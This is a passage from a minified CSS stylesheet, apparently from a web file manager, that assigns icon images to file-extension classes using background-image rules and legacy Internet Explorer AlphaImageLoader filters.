\9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/php.png?ver=3.30',sizingMethod='scale');}.x-pkg{background-image:url("../../../images/file_icon/icon_file/pkg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pkg.png?ver=3.30',sizingMethod='scale');}.x-pl{background-image:url("../../../images/file_icon/icon_file/pl.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pl.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pl.png?ver=3.30',sizingMethod='scale');}.x-png{background-image:url("../../../images/file_icon/icon_file/png.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/png.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/png.png?ver=3.30',sizingMethod='scale');}.x-pps{background-image:url("../../../images/file_icon/icon_file/pps.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pps.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pps.png?ver=3.30',sizingMethod='scale');}.x-ppsx{background-image:url("../../../images/file_icon/icon_file/ppsx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppsx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppsx.png?ver=3.30',sizingMethod='scale');}.x-ppt{background-image:url("../../../images/file_icon/icon_file/ppt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ppt.png?ver=3.30',sizingMethod='scale');}.x-pptx{background-image:url("../../../images/file_icon/icon_file/pptx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pptx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pptx.png?ver=3.30',sizingMethod='scale');}.x-pot{background-image:url("../../../images/file_icon/icon_file/pot.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pot.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pot.png?ver=3.30',sizingMethod='scale');}.x-potx,.x-ppam{background-image:url("../../../images/file_icon/icon_file/potx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/potx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/potx.png?ver=3.30',sizingMethod='scale');}.x-prproj{background-image:url("../../../images/file_icon/icon_file/prproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/prproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/prproj.png?ver=3.30',sizingMethod='scale');}.x-ps1{background-image:url("../../../images/file_icon/icon_file/ps1.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ps1.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/ps1.png?ver=3.30',sizingMethod='scale');}.x-psd{background-image:url("../../../images/file_icon/icon_file/psd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/psd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/psd.png?ver=3.30',sizingMethod='scale');}.x-pspimage{background-image:url("../../../images/file_icon/icon_file/pspimage.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pspimage.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pspimage.png?ver=3.30',sizingMethod='scale');}.x-pst{background-image:url("../../../images/file_icon/icon_file/pst.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pst.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pst.png?ver=3.30',sizingMethod='scale');}.x-pub{background-image:url("../../../images/file_icon/icon_file/pub.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pub.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/pub.png?ver=3.30',sizingMethod='scale');}.x-py{background-image:url("../../../images/file_icon/icon_file/py.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/py.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/py.png?ver=3.30',sizingMethod='scale');}.x-rar{background-image:url("../../../images/file_icon/icon_file/rar.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rar.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rar.png?ver=3.30',sizingMethod='scale');}.x-rb{background-image:url("../../../images/file_icon/icon_file/rb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rb.png?ver=3.30',sizingMethod='scale');}.x-reg{background-image:url("../../../images/file_icon/icon_file/reg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/reg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/reg.png?ver=3.30',sizingMethod='scale');}.x-resx{background-image:url("../../../images/file_icon/icon_file/resx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/resx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/resx.png?ver=3.30',sizingMethod='scale');}.x-rtf{background-image:url("../../../images/file_icon/icon_file/rtf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rtf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/rtf.png?ver=3.30',sizingMethod='scale');}.x-sitx{background-image:url("../../../images/file_icon/icon_file/sitx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sitx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sitx.png?ver=3.30',sizingMethod='scale');}.x-sln{background-image:url("../../../images/file_icon/icon_file/sln.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sln.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sln.png?ver=3.30',sizingMethod='scale');}.x-sql{background-image:url("../../../images/file_icon/icon_file/sql.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sql.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/sql.png?ver=3.30',sizingMethod='scale');}.x-suo{background-image:url("../../../images/file_icon/icon_file/suo.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/suo.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/suo.png?ver=3.30',sizingMethod='scale');}.x-svg{background-image:url("../../../images/file_icon/icon_file/svg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/svg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/svg.png?ver=3.30',sizingMethod='scale');}.x-swf{background-image:url("../../../images/file_icon/icon_file/swf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/swf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/swf.png?ver=3.30',sizingMethod='scale');}.x-tar{background-image:url("../../../images/file_icon/icon_file/tar.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tar.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tar.png?ver=3.30',sizingMethod='scale');}.x-tga{background-image:url("../../../images/file_icon/icon_file/tga.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tga.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tga.png?ver=3.30',sizingMethod='scale');}.x-tgz{background-image:url("../../../images/file_icon/icon_file/tgz.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tgz.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/tgz.png?ver=3.30',sizingMethod='scale');}.x-txt{background-image:url("../../../images/file_icon/icon_file/txt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/txt.png?ver=3.30',sizingMethod='scale');}.x-vb{background-image:url("../../../images/file_icon/icon_file/vb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vb.png?ver=3.30',sizingMethod='scale');}.x-vbproj{background-image:url("../../../images/file_icon/icon_file/vbproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbproj.png?ver=3.30',sizingMethod='scale');}.x-vbs{background-image:url("../../../images/file_icon/icon_file/vbs.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbs.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vbs.png?ver=3.30',sizingMethod='scale');}.x-vcf{background-image:url("../../../images/file_icon/icon_file/vcf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcf.png?ver=3.30',sizingMethod='scale');}.x-vcproj{background-image:url("../../../images/file_icon/icon_file/vcproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcproj.png?ver=3.30',sizingMethod='scale');}.x-vcxproj{background-image:url("../../../images/file_icon/icon_file/vcxproj.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcxproj.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vcxproj.png?ver=3.30',sizingMethod='scale');}.x-vdw{background-image:url("../../../images/file_icon/icon_file/vdw.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdw.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdw.png?ver=3.30',sizingMethod='scale');}.x-vdx{background-image:url("../../../images/file_icon/icon_file/vdx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vdx.png?ver=3.30',sizingMethod='scale');}.x-vsd{background-image:url("../../../images/file_icon/icon_file/vsd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsd.png?ver=3.30',sizingMethod='scale');}.x-vsdx{background-image:url("../../../images/file_icon/icon_file/vsdx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsdx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsdx.png?ver=3.30',sizingMethod='scale');}.x-vss{background-image:url("../../../images/file_icon/icon_file/vss.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vss.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vss.png?ver=3.30',sizingMethod='scale');}.x-vst{background-image:url("../../../images/file_icon/icon_file/vst.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vst.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vst.png?ver=3.30',sizingMethod='scale');}.x-vsx{background-image:url("../../../images/file_icon/icon_file/vsx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vsx.png?ver=3.30',sizingMethod='scale');}.x-vtx{background-image:url("../../../images/file_icon/icon_file/vtx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vtx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/vtx.png?ver=3.30',sizingMethod='scale');}.x-xaml{background-image:url("../../../images/file_icon/icon_file/xaml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xaml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xaml.png?ver=3.30',sizingMethod='scale');}.x-xap{background-image:url("../../../images/file_icon/icon_file/xap.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xap.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xap.png?ver=3.30',sizingMethod='scale');}.x-xls{background-image:url("../../../images/file_icon/icon_file/xls.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xls.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xls.png?ver=3.30',sizingMethod='scale');}.x-xlsb{background-image:url("../../../images/file_icon/icon_file/xlsb.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsb.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsb.png?ver=3.30',sizingMethod='scale');}.x-xlsm{background-image:url("../../../images/file_icon/icon_file/xlsm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsm.png?ver=3.30',sizingMethod='scale');}.x-xlsx{background-image:url("../../../images/file_icon/icon_file/xlsx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlsx.png?ver=3.30',sizingMethod='scale');}.x-xlt{background-image:url("../../../images/file_icon/icon_file/xlt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xlt.png?ver=3.30',sizingMethod='scale');}.x-xltx{background-image:url("../../../images/file_icon/icon_file/xltx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xltx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xltx.png?ver=3.30',sizingMethod='scale');}.x-xml{background-image:url("../../../images/file_icon/icon_file/xml.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xml.png?ver=3.30',sizingMethod='scale');}.x-xps{background-image:url("../../../images/file_icon/icon_file/xps.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xps.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xps.png?ver=3.30',sizingMethod='scale');}.x-xsd{background-image:url("../../../images/file_icon/icon_file/xsd.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsd.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsd.png?ver=3.30',sizingMethod='scale');}.x-xsl{background-image:url("../../../images/file_icon/icon_file/xsl.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsl.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/xsl.png?ver=3.30',sizingMethod='scale');}.x-y{background-image:url("../../../images/file_icon/icon_file/y.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/y.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/y.png?ver=3.30',sizingMethod='scale');}.x-zip{background-image:url("../../../images/file_icon/icon_file/zip.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/zip.png?ver=3.30',sizingMethod='scale');}.x-3dm,.x-3ds,.x-asm,.x-cam360,.x-catpart,.x-catproduct,.x-cgr,.x-collaboration,.x-dae,.x-dgn,.x-dlv3,.x-dwf,.x-dwfx,.x-dwg,.x-dwt,.x-dxf,.x-exp,.x-f3d,.x-fbx,.x-g,.x-gbxml,.x-iam,.x-idw,.x-ifc,.x-ige,.x-iges,.x-igs,.x-ipt,.x-jt,.x-model,.x-neu,.x-nwc,.x-nwd,.x-obj,.x-prt,.x-rvt,.x-sab,.x-sat,.x-session,.x-skp,.x-sldasm,.x-sldprt,.x-smb,.x-smt,.x-ste,.x-step,.x-stl,.x-stla,.x-stlb,.x-stp,.x-wire,.x-x_b,.x-x_t,.x-xas,.x-xpr{background-image:url("../../../images/file_icon/icon_file/autodesk/autodesk.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/autodesk.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/autodesk.png?ver=3.30',sizingMethod='scale');}.x-3ds{background-image:url("../../../images/file_icon/icon_file/autodesk/3ds.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3ds.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3ds.png?ver=3.30',sizingMethod='scale');}.x-3dm{background-image:url("../../../images/file_icon/icon_file/autodesk/3dm.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3dm.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/3dm.png?ver=3.30',sizingMethod='scale');}.x-dae{background-image:url("../../../images/file_icon/icon_file/autodesk/dae.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dae.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dae.png?ver=3.30',sizingMethod='scale');}.x-stl,.x-stla,.x-stlb{background-image:url("../../../images/file_icon/icon_file/autodesk/stl.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/stl.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/stl.png?ver=3.30',sizingMethod='scale');}.x-dwg{background-image:url("../../../images/file_icon/icon_file/autodesk/dwg.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwg.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwg.png?ver=3.30',sizingMethod='scale');}.x-dwf{background-image:url("../../../images/file_icon/icon_file/autodesk/dwf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');}.x-dwfx{background-image:url("../../../images/file_icon/icon_file/autodesk/dwf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dwf.png?ver=3.30',sizingMethod='scale');}.x-dxf{background-image:url("../../../images/file_icon/icon_file/autodesk/dxf.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dxf.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/dxf.png?ver=3.30',sizingMethod='scale');}.x-ifc{background-image:url("../../../images/file_icon/icon_file/autodesk/ifc.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/ifc.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/ifc.png?ver=3.30',sizingMethod='scale');}.x-iam{background-image:url("../../../images/file_icon/icon_file/autodesk/iam.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/iam.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/iam.png?ver=3.30',sizingMethod='scale');}.x-fbx{background-image:url("../../../images/file_icon/icon_file/autodesk/fbx.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/fbx.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/fbx.png?ver=3.30',sizingMethod='scale');}.x-rvt{background-image:url("../../../images/file_icon/icon_file/autodesk/rvt.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/rvt.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/rvt.png?ver=3.30',sizingMethod='scale');}.x-skp{background-image:url("../../../images/file_icon/icon_file/autodesk/skp.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/skp.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/skp.png?ver=3.30',sizingMethod='scale');}.x-vnd,.x-dgn{background-image:url("../../../images/file_icon/icon_file/autodesk/vnd-dgn.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/vnd-dgn.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_file/autodesk/vnd-dgn.png?ver=3.30',sizingMethod='scale');}.x-folder{background-image:url("../../../images/file_icon/icon_others/folder.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder.png?ver=3.30',sizingMethod='scale');}.x-folder-share{background-image:url("../../../images/file_icon/icon_others/folder_public.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/folder_public.png?ver=3.30',sizingMethod='scale');}.x-recycle{background-image:url("../../../images/file_icon/icon_others/recycle.png");background-image:none \9;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle.png?ver=3.30',sizingMethod='scale');-ms-filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='static/images/file_icon/icon_others/recycle.png?ver=3.30',sizingMethod='scale');}.x-recycle-full{background-image:url("../../../images/file_icon/icon_others/recycle_full.png");background-image:none 